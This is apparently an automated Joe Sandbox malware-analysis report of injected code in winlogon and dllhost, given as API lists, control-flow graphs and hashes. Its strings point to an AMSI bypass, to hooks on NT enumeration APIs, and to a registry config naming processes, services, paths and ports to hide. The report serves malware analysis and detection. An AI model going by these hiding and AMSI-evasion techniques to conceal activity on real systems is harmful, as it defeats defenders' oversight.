                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                  • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                  • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                  • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                  Execution Graph

                                                  Execution Coverage:1.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:2.7%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:17
                                                  execution_graph 22415 1ca7d1e41f9 22418 1ca7d1e4146 _invalid_parameter_noinfo 22415->22418 22416 1ca7d1e41b0 22417 1ca7d1e4196 VirtualQuery 22417->22416 22417->22418 22418->22416 22418->22417 22419 1ca7d1e41ca VirtualAlloc 22418->22419 22419->22416 22420 1ca7d1e41fb GetLastError 22419->22420 22420->22418 22422 1ca7d1e1bc4 22429 1ca7d1e1724 GetProcessHeap HeapAlloc 22422->22429 22424 1ca7d1e1bd3 22425 1ca7d1e1bda SleepEx 22424->22425 22428 1ca7d1e159c StrCmpIW StrCmpW 22424->22428 22480 1ca7d1e19b0 12 API calls 22424->22480 22426 1ca7d1e1724 50 API calls 22425->22426 22426->22424 22428->22424 22481 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22429->22481 22431 1ca7d1e174c 22482 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22431->22482 22433 1ca7d1e1754 22483 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22433->22483 22435 1ca7d1e175d 22484 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22435->22484 22437 1ca7d1e1766 22485 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22437->22485 22439 1ca7d1e176f 22486 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22439->22486 22441 1ca7d1e1778 22487 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22441->22487 22443 1ca7d1e1781 22488 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22443->22488 22445 1ca7d1e178a RegOpenKeyExW 22446 1ca7d1e19a2 22445->22446 22447 1ca7d1e17bc RegOpenKeyExW 22445->22447 22446->22424 22448 1ca7d1e17e5 22447->22448 22449 1ca7d1e17fb RegOpenKeyExW 22447->22449 22495 1ca7d1e12b8 16 API calls 22448->22495 22451 1ca7d1e1836 RegOpenKeyExW 22449->22451 22452 1ca7d1e181f 22449->22452 22453 1ca7d1e1871 RegOpenKeyExW 22451->22453 22454 1ca7d1e185a 22451->22454 22489 1ca7d1e104c RegQueryInfoKeyW 22452->22489 22459 1ca7d1e1895 22453->22459 22460 1ca7d1e18ac RegOpenKeyExW 22453->22460 22496 1ca7d1e12b8 16 API calls 22454->22496 22455 1ca7d1e17f1 RegCloseKey 22455->22449 22497 1ca7d1e12b8 16 API calls 22459->22497 22463 1ca7d1e18e7 RegOpenKeyExW 22460->22463 22464 1ca7d1e18d0 22460->22464 22461 1ca7d1e1867 RegCloseKey 22461->22453 22467 1ca7d1e1922 RegOpenKeyExW 22463->22467 22468 1ca7d1e190b 22463->22468 22498 1ca7d1e12b8 16 API calls 22464->22498 22465 1ca7d1e18a2 RegCloseKey 22465->22460 22469 1ca7d1e1946 22467->22469 22470 1ca7d1e195d RegOpenKeyExW 22467->22470 22472 1ca7d1e104c 6 API calls 22468->22472 22474 1ca7d1e104c 6 API calls 22469->22474 22475 1ca7d1e1998 RegCloseKey 22470->22475 22476 1ca7d1e1981 22470->22476 22471 1ca7d1e18dd RegCloseKey 22471->22463 22473 1ca7d1e1918 RegCloseKey 22472->22473 22473->22467 22477 1ca7d1e1953 RegCloseKey 22474->22477 22475->22446 22478 1ca7d1e104c 6 API calls 22476->22478 22477->22470 22479 1ca7d1e198e RegCloseKey 22478->22479 22479->22475 22481->22431 22482->22433 22483->22435 22484->22437 22485->22439 22486->22441 22487->22443 22488->22445 22490 1ca7d1e11b5 RegCloseKey 22489->22490 22491 1ca7d1e10bf 22489->22491 22490->22451 22491->22490 22492 1ca7d1e10cf RegEnumValueW 22491->22492 22493 1ca7d1e1125 22492->22493 22493->22490 22493->22492 22494 1ca7d1e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22493->22494 22494->22493 22495->22455 22496->22461 22497->22465 22498->22471 22499 1ca7d1e2c80 TlsGetValue TlsGetValue TlsGetValue 22500 1ca7d1e2cd9 22499->22500 22501 1ca7d1e2d51 NtEnumerateValueKey 22499->22501 22500->22501 22506 1ca7d1e2ce1 22500->22506 22502 1ca7d1e2d4c 22501->22502 22509 1ca7d1e2d86 22501->22509 22503 1ca7d1e2d2d NtEnumerateValueKey 22503->22502 22503->22506 22504 1ca7d1e2e06 TlsSetValue TlsSetValue TlsSetValue 22504->22502 22505 1ca7d1e2da0 NtEnumerateValueKey 22505->22509 22506->22502 22506->22503 22506->22504 22510 1ca7d1e3f88 22506->22510 22508 1ca7d1e3f88 StrCmpNIW 22508->22509 22509->22502 22509->22504 22509->22505 22509->22508 22511 1ca7d1e3f95 StrCmpNIW 22510->22511 22512 1ca7d1e3faa 22510->22512 22511->22512 22512->22506 22513 1ca7d1e6430 22514 1ca7d1e643d 22513->22514 22515 1ca7d1e6449 22514->22515 22522 1ca7d1e655a 22514->22522 22516 1ca7d1e647e 22515->22516 22517 1ca7d1e64cd 22515->22517 22518 1ca7d1e64a6 SetThreadContext 22516->22518 22518->22517 22519 1ca7d1e6581 VirtualProtect FlushInstructionCache 22519->22522 22520 1ca7d1e663e 22521 1ca7d1e665e 22520->22521 22531 1ca7d1e4b20 VirtualFree 22520->22531 22532 1ca7d1e5530 GetCurrentProcess 22521->22532 22522->22519 22522->22520 22525 1ca7d1e6663 22526 1ca7d1e66b7 22525->22526 22527 1ca7d1e6677 ResumeThread 22525->22527 22536 1ca7d1e8070 8 API calls 2 library calls 22526->22536 22528 1ca7d1e66ab 22527->22528 22528->22525 22530 1ca7d1e66ff 22531->22521 22533 1ca7d1e554c 22532->22533 22534 1ca7d1e5562 VirtualProtect FlushInstructionCache 22533->22534 22535 1ca7d1e5593 22533->22535 22534->22533 22535->22525 22536->22530 22537 1ca7d1ef370 VirtualProtect 22539 1ca7d1e1e3c LoadLibraryA GetProcAddress 22540 1ca7d1e1e62 SleepEx 22539->22540 22541 1ca7d1e1e6f 22539->22541 22540->22540 22542 1ca7d1e5c8d 22544 1ca7d1e5c94 22542->22544 22543 1ca7d1e5cfb 22544->22543 22545 1ca7d1e5d77 VirtualProtect 22544->22545 22546 1ca7d1e5da3 GetLastError 22545->22546 22547 1ca7d1e5db1 22545->22547 22546->22547

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$Enumerate
                                                  • String ID:
                                                  • API String ID: 3520290360-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

                                                  Control-flow Graph

                                                  control_flow_graph 223 1ca7d1e1e3c-1ca7d1e1e60 LoadLibraryA GetProcAddress 224 1ca7d1e1e62-1ca7d1e1e6d SleepEx 223->224 225 1ca7d1e1e6f-1ca7d1e1e73 223->225 224->224
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

                                                  Control-flow Graph

                                                  control_flow_graph 151 1ca7d1e6270-1ca7d1e6297 152 1ca7d1e6299-1ca7d1e62a8 151->152 153 1ca7d1e62ab-1ca7d1e62b6 GetCurrentThreadId 151->153 152->153 154 1ca7d1e62b8-1ca7d1e62bd 153->154 155 1ca7d1e62c2-1ca7d1e62c9 153->155 156 1ca7d1e66ef-1ca7d1e6706 call 1ca7d1e8070 154->156 157 1ca7d1e62db-1ca7d1e62ef 155->157 158 1ca7d1e62cb-1ca7d1e62d6 call 1ca7d1e60a0 155->158 161 1ca7d1e62fe-1ca7d1e6304 157->161 158->156 164 1ca7d1e63d5-1ca7d1e63f6 161->164 165 1ca7d1e630a-1ca7d1e6313 161->165 169 1ca7d1e655f-1ca7d1e6570 call 1ca7d1e7bff 164->169 170 1ca7d1e63fc-1ca7d1e641c GetThreadContext 164->170 167 1ca7d1e6315-1ca7d1e6358 call 1ca7d1f3a40 165->167 168 1ca7d1e635a-1ca7d1e63cd call 1ca7d1e4c50 call 1ca7d1e4bf0 call 1ca7d1e4bb0 165->168 180 1ca7d1e63d0 167->180 168->180 185 1ca7d1e6575-1ca7d1e657b 169->185 173 1ca7d1e6422-1ca7d1e6443 170->173 174 1ca7d1e655a 170->174 173->174 184 1ca7d1e6449-1ca7d1e6452 173->184 174->169 180->161 187 1ca7d1e6454-1ca7d1e6465 184->187 188 1ca7d1e64d2-1ca7d1e64e3 184->188 189 1ca7d1e6581-1ca7d1e65d8 VirtualProtect FlushInstructionCache 185->189 190 1ca7d1e663e-1ca7d1e664e 185->190 196 1ca7d1e6467-1ca7d1e647c 187->196 197 1ca7d1e64cd 187->197 191 1ca7d1e6555 188->191 192 1ca7d1e64e5-1ca7d1e6503 188->192 198 1ca7d1e6609-1ca7d1e6639 call 1ca7d1e7fdc 189->198 199 1ca7d1e65da-1ca7d1e65e4 189->199 194 1ca7d1e6650-1ca7d1e6657 190->194 195 1ca7d1e665e-1ca7d1e666a call 1ca7d1e5530 190->195 192->191 200 1ca7d1e6505-1ca7d1e6550 call 1ca7d1e4040 call 1ca7d1e7c1d 192->200 194->195 202 1ca7d1e6659 call 1ca7d1e4b20 194->202 214 1ca7d1e666f-1ca7d1e6675 195->214 196->197 204 1ca7d1e647e-1ca7d1e64c8 call 1ca7d1e40b0 SetThreadContext 196->204 197->191 198->185 199->198 205 1ca7d1e65e6-1ca7d1e6601 call 1ca7d1e4ad0 199->205 200->191 202->195 204->197 205->198 217 1ca7d1e66b7-1ca7d1e66d5 214->217 218 1ca7d1e6677-1ca7d1e66b5 ResumeThread call 1ca7d1e7fdc 214->218 219 1ca7d1e66e9 217->219 220 1ca7d1e66d7-1ca7d1e66e6 217->220 218->214 219->156 220->219
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                                  • Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
                                                  • Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                                  • Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

                                                  Control-flow Graph

                                                  control_flow_graph 226 1ca7d1e5810-1ca7d1e583c 227 1ca7d1e583e-1ca7d1e5846 226->227 228 1ca7d1e584d-1ca7d1e5856 226->228 227->228 229 1ca7d1e5858-1ca7d1e5860 228->229 230 1ca7d1e5867-1ca7d1e5870 228->230 229->230 231 1ca7d1e5872-1ca7d1e587a 230->231 232 1ca7d1e5881-1ca7d1e588a 230->232 231->232 233 1ca7d1e5896-1ca7d1e58a1 GetCurrentThreadId 232->233 234 1ca7d1e588c-1ca7d1e5891 232->234 236 1ca7d1e58a3-1ca7d1e58a8 233->236 237 1ca7d1e58ad-1ca7d1e58b4 233->237 235 1ca7d1e5e13-1ca7d1e5e1a 234->235 236->235 238 1ca7d1e58b6-1ca7d1e58bc 237->238 239 1ca7d1e58c1-1ca7d1e58ca 237->239 238->235 240 1ca7d1e58d6-1ca7d1e58e2 239->240 241 1ca7d1e58cc-1ca7d1e58d1 239->241 242 1ca7d1e58e4-1ca7d1e5909 240->242 243 1ca7d1e590e-1ca7d1e5965 call 1ca7d1e5e20 * 2 240->243 241->235 242->235 248 1ca7d1e5967-1ca7d1e596e 243->248 249 1ca7d1e597a-1ca7d1e5983 243->249 250 1ca7d1e5976 248->250 251 1ca7d1e5970 248->251 252 1ca7d1e5995-1ca7d1e599e 249->252 253 1ca7d1e5985-1ca7d1e5992 249->253 255 1ca7d1e59e6-1ca7d1e59ea 250->255 254 1ca7d1e59f0-1ca7d1e59f6 251->254 256 1ca7d1e59b3-1ca7d1e59d8 call 1ca7d1e7fa0 252->256 257 1ca7d1e59a0-1ca7d1e59b0 252->257 253->252 258 1ca7d1e59f8-1ca7d1e5a14 call 1ca7d1e4ad0 254->258 259 1ca7d1e5a25-1ca7d1e5a2b 254->259 255->254 265 1ca7d1e59de 256->265 266 1ca7d1e5a6d-1ca7d1e5a82 call 1ca7d1e4400 256->266 257->256 258->259 269 1ca7d1e5a16-1ca7d1e5a1e 258->269 263 1ca7d1e5a55-1ca7d1e5a68 259->263 264 1ca7d1e5a2d-1ca7d1e5a4c call 1ca7d1e7fdc 259->264 263->235 264->263 265->255 273 1ca7d1e5a84-1ca7d1e5a8c 266->273 274 1ca7d1e5a91-1ca7d1e5a9a 266->274 269->259 273->255 275 1ca7d1e5aac-1ca7d1e5afa call 1ca7d1f40e0 274->275 276 1ca7d1e5a9c-1ca7d1e5aa9 274->276 279 1ca7d1e5b02-1ca7d1e5b0a 275->279 276->275 280 1ca7d1e5c17-1ca7d1e5c1f 279->280 281 1ca7d1e5b10-1ca7d1e5bfb call 1ca7d1e7b80 279->281 282 1ca7d1e5c63-1ca7d1e5c6b 280->282 283 1ca7d1e5c21-1ca7d1e5c34 call 1ca7d1e4cd0 280->283 293 1ca7d1e5bff-1ca7d1e5c0e call 1ca7d1e47a0 281->293 294 1ca7d1e5bfd 281->294 286 1ca7d1e5c77-1ca7d1e5c86 282->286 287 1ca7d1e5c6d-1ca7d1e5c75 282->287 295 1ca7d1e5c38-1ca7d1e5c61 283->295 296 1ca7d1e5c36 283->296 291 1ca7d1e5c88 286->291 292 1ca7d1e5c8f 286->292 287->286 290 1ca7d1e5c94-1ca7d1e5ca1 287->290 298 1ca7d1e5ca4-1ca7d1e5cf9 call 1ca7d1f3a40 290->298 299 1ca7d1e5ca3 290->299 291->292 292->290 303 1ca7d1e5c12 293->303 304 1ca7d1e5c10 293->304 294->280 295->280 296->282 305 1ca7d1e5d08-1ca7d1e5da1 call 1ca7d1e4c50 call 1ca7d1e4bb0 VirtualProtect 298->305 306 1ca7d1e5cfb-1ca7d1e5d03 298->306 299->298 303->279 304->280 311 1ca7d1e5da3-1ca7d1e5da8 GetLastError 305->311 312 1ca7d1e5db1-1ca7d1e5e11 305->312 311->312 312->235
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                                  • Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
                                                  • Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                                  • Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
                                                  • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
                                                  • PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44
                                                    • Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0
